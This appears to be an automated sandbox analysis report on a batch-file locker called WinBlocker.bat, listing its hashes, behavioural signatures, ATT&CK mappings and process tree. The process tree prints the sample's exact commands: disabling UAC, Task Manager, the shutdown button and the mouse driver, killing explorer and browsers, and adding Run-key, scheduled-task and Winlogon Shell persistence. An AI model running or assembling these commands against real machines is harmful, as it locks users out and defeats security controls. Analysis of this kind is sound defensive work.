Analysis
max time kernel: 150s
max time network: 124s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06/08/2024, 02:38
Static task: static1
Behavioral task: behavioral1
  Sample: WinBlocker.bat
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: WinBlocker.bat
  Resource: win10v2004-20240802-en
General
Target: WinBlocker.bat
Size: 2KB
MD5: 1b5a43b427cbec4b2d98381bd745f252
SHA1: e35fa4eb5b4d03de11e34b648ccd0eb3bf64aca9
SHA256: 16a9fd99658aec5a790b84002e2bd1388d82f0b0ac8d951fc65195ca4f3305af
SHA512: 3689f9000a0ce44ba4a1503f59e3b94706ff9f73cc6baeb0f1105971c1c3fdc39373d091c8187ad681af8e4954bd0bca602ced76f080faa1c2f4082219c085a5
Malware Config
Signatures
UAC bypass
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (reg.exe)
Disables Task Manager via registry modification
Drops file in Drivers directory 64 IoCs
Manipulates Digital Signatures 4 IoCs
Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.
- File opened for modification: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll (cmd.exe)
- File opened for modification: C:\Windows\System32\wintrust.dll (cmd.exe)
- File opened for modification: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll (cmd.exe)
- File opened for modification: C:\Windows\SysWOW64\wintrust.dll (cmd.exe)
Boot or Logon Autostart Execution: Print Processors 1 TTPs 1 IoCs
Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.
- File opened for modification: C:\Windows\System32\spool\prtprocs\x64\winprint.dll (cmd.exe)
Drops startup file 2 IoCs
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinBlocker.bat (cmd.exe)
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinBlocker.bat (cmd.exe)
Adds Run key to start application 2 TTPs 1 IoCs
- Set value (str): \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinBlocker.bat = "WinBlocker.bat" (reg.exe)
Drops desktop.ini file(s) 31 IoCs
Drops autorun.inf file 1 TTPs 1 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
- File opened for modification: C:\Windows\BITLOC~1\autorun.inf (cmd.exe)
Drops file in System32 directory 64 IoCs
Modifies termsrv.dll 1 TTPs 1 IoCs
Commonly used to allow simultaneous RDP sessions.
- File opened for modification: C:\Windows\System32\termsrv.dll (cmd.exe)
Drops file in Windows directory 64 IoCs
Delays execution with timeout.exe 1 IoCs
- PID 4764 timeout.exe
Kills process with taskkill 5 IoCs
- PID 668 taskkill.exe
- PID 2936 taskkill.exe
- PID 3996 taskkill.exe
- PID 1836 taskkill.exe
- PID 3292 taskkill.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
- PID 2112 schtasks.exe
Suspicious use of AdjustPrivilegeToken 5 IoCs
- Token: SeDebugPrivilege, PID 668 taskkill.exe
- Token: SeDebugPrivilege, PID 2936 taskkill.exe
- Token: SeDebugPrivilege, PID 3996 taskkill.exe
- Token: SeDebugPrivilege, PID 1836 taskkill.exe
- Token: SeDebugPrivilege, PID 3292 taskkill.exe
Suspicious use of WriteProcessMemory 30 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WinBlocker.bat"
  PID: 624
  Signatures: Drops file in Drivers directory; Manipulates Digital Signatures; Boot or Logon Autostart Execution: Print Processors; Drops startup file; Drops desktop.ini file(s); Drops autorun.inf file; Drops file in System32 directory; Modifies termsrv.dll; Drops file in Windows directory; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\chcp.com
    Command line: chcp 65001
    PID: 3740
  - C:\Windows\system32\taskkill.exe
    Command line: taskkill /F /IM explorer.exe
    PID: 668
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\reg.exe
    Command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
    PID: 1168
    Signatures: UAC bypass
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\admin.vbs
    PID: 4176
  - C:\Windows\system32\reg.exe
    Command line: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "WinBlocker.bat" /t REG_SZ /d "WinBlocker.bat" /f
    PID: 2272
    Signatures: Adds Run key to start application
  - C:\Windows\system32\schtasks.exe
    Command line: schtasks /create /tn "WinBlocker.bat" /tr "WinBlocker.bat" /sc ONLOGON /rl HIGHEST /f
    PID: 2112
    Signatures: Scheduled Task/Job: Scheduled Task
  - C:\Windows\system32\taskkill.exe
    Command line: taskkill /F /IM explorer.exe
    PID: 2936
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\taskkill.exe
    Command line: taskkill /F /IM msedge.exe
    PID: 3996
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\taskkill.exe
    Command line: taskkill /F /IM chrome.exe
    PID: 1836
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\taskkill.exe
    Command line: taskkill /F /IM browser.exe
    PID: 3292
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\reg.exe
    Command line: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\WinBlocker.bat" /f
    PID: 4848
  - C:\Windows\system32\reg.exe
    Command line: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    PID: 2736
  - C:\Windows\system32\reg.exe
    Command line: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouclass" /v Start /t REG_DWORD /d 4 /f
    PID: 4600
  - C:\Windows\system32\reg.exe
    Command line: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableShutdownButton /t REG_DWORD /d 1 /f
    PID: 2764
  - C:\Windows\system32\timeout.exe
    Command line: TIMEOUT /T 900 /NOBREAK
    PID: 4764
    Signatures: Delays execution with timeout.exe
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (2)
  - Print Processors (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (2)
  - Print Processors (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (1)
  - Disable or Modify Tools (1)
- Modify Registry (2)